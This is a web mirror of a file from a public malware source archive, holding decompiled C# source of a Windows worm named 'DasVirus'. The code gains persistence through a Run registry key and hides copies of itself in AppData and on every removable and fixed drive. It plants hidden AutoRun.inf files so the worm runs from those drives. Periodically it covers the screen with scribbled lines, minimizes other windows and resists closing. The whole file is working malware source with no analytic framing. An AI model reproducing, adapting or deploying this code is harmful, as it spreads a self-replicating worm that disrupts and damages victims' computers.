mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-26 05:15:28 +00:00
361 lines
12 KiB
C#
361 lines
12 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
|
// Type: DasVirus.Form1
|
|||
|
|
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
|
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
|
|||
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
|
|||
|
|
|
|||
|
|
using DasVirus.My;
|
|||
|
|
using Microsoft.VisualBasic;
|
|||
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
|
using System;
|
|||
|
|
using System.Collections.Generic;
|
|||
|
|
using System.ComponentModel;
|
|||
|
|
using System.Diagnostics;
|
|||
|
|
using System.Drawing;
|
|||
|
|
using System.IO;
|
|||
|
|
using System.Runtime.CompilerServices;
|
|||
|
|
using System.Runtime.InteropServices;
|
|||
|
|
using System.Windows.Forms;
|
|||
|
|
|
|||
|
|
namespace DasVirus
|
|||
|
|
{
|
|||
|
|
[DesignerGenerated]
|
|||
|
|
public class Form1 : Form
|
|||
|
|
{
|
|||
|
|
private static List<WeakReference> __ENCList = new List<WeakReference>();
|
|||
|
|
private IContainer components;
|
|||
|
|
[AccessedThroughProperty("Timer1")]
|
|||
|
|
private Timer _Timer1;
|
|||
|
|
[AccessedThroughProperty("Timer2")]
|
|||
|
|
private Timer _Timer2;
|
|||
|
|
[AccessedThroughProperty("Timer3")]
|
|||
|
|
private Timer _Timer3;
|
|||
|
|
[AccessedThroughProperty("Timer4")]
|
|||
|
|
private Timer _Timer4;
|
|||
|
|
private Point lPoint;
|
|||
|
|
private Point nPoint;
|
|||
|
|
private Rectangle Scr;
|
|||
|
|
private Graphics Graph;
|
|||
|
|
private bool OpStatus;
|
|||
|
|
private int PID;
|
|||
|
|
private Pen MyPen;
|
|||
|
|
[SpecialName]
|
|||
|
|
private int \u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks;
|
|||
|
|
|
|||
|
|
[DebuggerNonUserCode]
|
|||
|
|
static Form1()
|
|||
|
|
{
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[DebuggerNonUserCode]
|
|||
|
|
public Form1()
|
|||
|
|
{
|
|||
|
|
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
|
|||
|
|
this.KeyDown += new KeyEventHandler(this.Form1_KeyDown);
|
|||
|
|
this.Load += new EventHandler(this.Form1_Load);
|
|||
|
|
lock (Form1.__ENCList)
|
|||
|
|
Form1.__ENCList.Add(new WeakReference((object) this));
|
|||
|
|
this.InitializeComponent();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[STAThread]
|
|||
|
|
public static void Main() => Application.Run((Form) MyProject.Forms.Form1);
|
|||
|
|
|
|||
|
|
[DebuggerNonUserCode]
|
|||
|
|
protected override void Dispose(bool disposing)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
if (!disposing || this.components == null)
|
|||
|
|
return;
|
|||
|
|
this.components.Dispose();
|
|||
|
|
}
|
|||
|
|
finally
|
|||
|
|
{
|
|||
|
|
base.Dispose(disposing);
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[DebuggerStepThrough]
|
|||
|
|
private void InitializeComponent()
|
|||
|
|
{
|
|||
|
|
this.components = (IContainer) new System.ComponentModel.Container();
|
|||
|
|
this.Timer1 = new Timer(this.components);
|
|||
|
|
this.Timer2 = new Timer(this.components);
|
|||
|
|
this.Timer3 = new Timer(this.components);
|
|||
|
|
this.Timer4 = new Timer(this.components);
|
|||
|
|
this.SuspendLayout();
|
|||
|
|
this.Timer1.Interval = 50;
|
|||
|
|
this.Timer2.Interval = 2000;
|
|||
|
|
this.Timer3.Interval = 1000;
|
|||
|
|
this.Timer4.Interval = 15000;
|
|||
|
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
|
this.ClientSize = new Size(292, 273);
|
|||
|
|
this.ControlBox = false;
|
|||
|
|
this.DoubleBuffered = true;
|
|||
|
|
this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
|
|||
|
|
this.Name = nameof (Form1);
|
|||
|
|
this.Opacity = 0.0;
|
|||
|
|
this.ShowInTaskbar = false;
|
|||
|
|
this.Text = "DasVirus";
|
|||
|
|
this.TopMost = true;
|
|||
|
|
this.TransparencyKey = SystemColors.Control;
|
|||
|
|
this.ResumeLayout(false);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
internal virtual Timer Timer1
|
|||
|
|
{
|
|||
|
|
[DebuggerNonUserCode] get => this._Timer1;
|
|||
|
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
|
{
|
|||
|
|
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
|
|||
|
|
if (this._Timer1 != null)
|
|||
|
|
this._Timer1.Tick -= eventHandler;
|
|||
|
|
this._Timer1 = value;
|
|||
|
|
if (this._Timer1 == null)
|
|||
|
|
return;
|
|||
|
|
this._Timer1.Tick += eventHandler;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
internal virtual Timer Timer2
|
|||
|
|
{
|
|||
|
|
[DebuggerNonUserCode] get => this._Timer2;
|
|||
|
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
|
{
|
|||
|
|
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
|
|||
|
|
if (this._Timer2 != null)
|
|||
|
|
this._Timer2.Tick -= eventHandler;
|
|||
|
|
this._Timer2 = value;
|
|||
|
|
if (this._Timer2 == null)
|
|||
|
|
return;
|
|||
|
|
this._Timer2.Tick += eventHandler;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
internal virtual Timer Timer3
|
|||
|
|
{
|
|||
|
|
[DebuggerNonUserCode] get => this._Timer3;
|
|||
|
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
|
{
|
|||
|
|
EventHandler eventHandler = new EventHandler(this.Timer3_Tick);
|
|||
|
|
if (this._Timer3 != null)
|
|||
|
|
this._Timer3.Tick -= eventHandler;
|
|||
|
|
this._Timer3 = value;
|
|||
|
|
if (this._Timer3 == null)
|
|||
|
|
return;
|
|||
|
|
this._Timer3.Tick += eventHandler;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
internal virtual Timer Timer4
|
|||
|
|
{
|
|||
|
|
[DebuggerNonUserCode] get => this._Timer4;
|
|||
|
|
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
|
|||
|
|
{
|
|||
|
|
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
|
|||
|
|
if (this._Timer4 != null)
|
|||
|
|
this._Timer4.Tick -= eventHandler;
|
|||
|
|
this._Timer4 = value;
|
|||
|
|
if (this._Timer4 == null)
|
|||
|
|
return;
|
|||
|
|
this._Timer4.Tick += eventHandler;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
public static extern bool IsWindowVisible(IntPtr hWnd);
|
|||
|
|
|
|||
|
|
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|||
|
|
public static extern bool ShowWindow(IntPtr hWnd, Form1.nCS_Commands nCmdShow);
|
|||
|
|
|
|||
|
|
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
|
|||
|
|
{
|
|||
|
|
if (!this.OpStatus)
|
|||
|
|
return;
|
|||
|
|
e.Cancel = true;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Form1_KeyDown(object sender, KeyEventArgs e)
|
|||
|
|
{
|
|||
|
|
e.SuppressKeyPress = true;
|
|||
|
|
if ((e.Modifiers & Keys.Control) == 0 || e.KeyCode != Keys.C)
|
|||
|
|
return;
|
|||
|
|
this.OpStatus = false;
|
|||
|
|
ProjectData.EndApp();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Form1_Load(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
|
|||
|
|
if (Operators.CompareString(MyProject.Application.Info.DirectoryPath.ToLower(), folderPath.ToLower(), false) != 0)
|
|||
|
|
{
|
|||
|
|
Process.Start("explorer.exe", MyProject.Application.Info.DirectoryPath);
|
|||
|
|
if (Process.GetProcessesByName("dasvirus").Length > 1)
|
|||
|
|
ProjectData.EndApp();
|
|||
|
|
this.CopyMeHidden(folderPath + "\\DasVirus.exe");
|
|||
|
|
MyProject.Computer.Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("DasVirus Startup", (object) (folderPath + "\\DasVirus.exe"));
|
|||
|
|
Process.Start(folderPath + "\\DasVirus.exe");
|
|||
|
|
ProjectData.EndApp();
|
|||
|
|
}
|
|||
|
|
VBMath.Randomize();
|
|||
|
|
this.Timer3.Start();
|
|||
|
|
this.Timer4.Start();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public Point GenPoint()
|
|||
|
|
{
|
|||
|
|
Point point;
|
|||
|
|
point.X = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Width)));
|
|||
|
|
point.Y = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Height)));
|
|||
|
|
return point;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Timer3_Tick(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
if (!(MyProject.Computer.Clock.LocalTime.Second == 0 & MyProject.Computer.Clock.LocalTime.Minute % 15 == 0))
|
|||
|
|
return;
|
|||
|
|
this.InitZlovred();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public void InitZlovred()
|
|||
|
|
{
|
|||
|
|
this.Opacity = 1.0;
|
|||
|
|
this.Scr = Screen.PrimaryScreen.Bounds;
|
|||
|
|
this.SetBounds(-3, -13, checked (this.Scr.Width + 6), checked (this.Scr.Height + 25));
|
|||
|
|
this.Region = new Region(new Rectangle(3, 18, this.Scr.Width, this.Scr.Height));
|
|||
|
|
this.lPoint = this.GenPoint();
|
|||
|
|
this.Graph = this.CreateGraphics();
|
|||
|
|
this.OpStatus = false;
|
|||
|
|
this.PID = Process.GetCurrentProcess().Id;
|
|||
|
|
this.MyPen = Pens.Black;
|
|||
|
|
this.Timer1.Start();
|
|||
|
|
this.Timer2.Start();
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Timer1_Tick(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
checked { ++this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks; }
|
|||
|
|
if (this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks > 100)
|
|||
|
|
{
|
|||
|
|
this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks = 0;
|
|||
|
|
this.MyPen = new Pen(Color.FromArgb(checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue)))));
|
|||
|
|
}
|
|||
|
|
this.nPoint = this.GenPoint();
|
|||
|
|
this.Graph.DrawLine(this.MyPen, this.lPoint, this.nPoint);
|
|||
|
|
this.Graph.DrawString("DasVirus 1.0 beta 1 by HD", new Font("Verdana", 20f, FontStyle.Regular), Brushes.YellowGreen, 20f, 20f);
|
|||
|
|
this.lPoint = this.nPoint;
|
|||
|
|
Interaction.AppActivate(this.PID);
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Timer2_Tick(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
Process[] processes = Process.GetProcesses();
|
|||
|
|
int num = checked (processes.Length - 1);
|
|||
|
|
int index = 0;
|
|||
|
|
while (index <= num)
|
|||
|
|
{
|
|||
|
|
if (processes[index].MainWindowHandle != this.Handle && Operators.CompareString(processes[index].ProcessName.ToLower(), "explorer", false) != 0 && Form1.IsWindowVisible(processes[index].MainWindowHandle))
|
|||
|
|
Form1.ShowWindow(processes[index].MainWindowHandle, Form1.nCS_Commands.SW_MINIMIZE);
|
|||
|
|
checked { ++index; }
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
private void Timer4_Tick(object sender, EventArgs e)
|
|||
|
|
{
|
|||
|
|
DriveInfo[] drives = DriveInfo.GetDrives();
|
|||
|
|
int num = checked (drives.Length - 1);
|
|||
|
|
int index = 0;
|
|||
|
|
while (index <= num)
|
|||
|
|
{
|
|||
|
|
if (Strings.Asc(Strings.Left(drives[index].Name, 1)) > 66)
|
|||
|
|
{
|
|||
|
|
this.CopyMeHidden(drives[index].Name + "DasVirus.exe");
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.SetAttributes(drives[index].Name + "AutoRun.inf", FileAttributes.Normal);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
StreamWriter streamWriter = new StreamWriter(drives[index].Name + "AutoRun.inf", false);
|
|||
|
|
streamWriter.Write("[AutoRun]\r\nShellExecute=DasVirus.exe");
|
|||
|
|
streamWriter.Flush();
|
|||
|
|
streamWriter.Close();
|
|||
|
|
streamWriter.Dispose();
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.SetAttributes(drives[index].Name + "autorun.inf", FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
checked { ++index; }
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public void CopyMeHidden(string DestPath)
|
|||
|
|
{
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.SetAttributes(DestPath, FileAttributes.Normal);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.Copy(MyProject.Application.Info.DirectoryPath + "\\DasVirus.exe", DestPath, true);
|
|||
|
|
try
|
|||
|
|
{
|
|||
|
|
File.SetAttributes(DestPath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
catch (Exception ex)
|
|||
|
|
{
|
|||
|
|
ProjectData.SetProjectError(ex);
|
|||
|
|
ProjectData.ClearProjectError();
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
public enum nCS_Commands
|
|||
|
|
{
|
|||
|
|
SW_HIDE = 0,
|
|||
|
|
SW_NORMAL = 1,
|
|||
|
|
SW_SHOWNORMAL = 1,
|
|||
|
|
SW_SHOWMINIMIZED = 2,
|
|||
|
|
SW_MAXIMIZE = 3,
|
|||
|
|
SW_SHOWMAXIMIZED = 3,
|
|||
|
|
SW_SHOWNOACTIVATE = 4,
|
|||
|
|
SW_SHOW = 5,
|
|||
|
|
SW_MINIMIZE = 6,
|
|||
|
|
SW_SHOWMINNOACTIVE = 7,
|
|||
|
|
SW_SHOWNA = 8,
|
|||
|
|
SW_RESTORE = 9,
|
|||
|
|
SW_MAX = 10, // 0x0000000A
|
|||
|
|
SW_SHOWDEFAULT = 10, // 0x0000000A
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|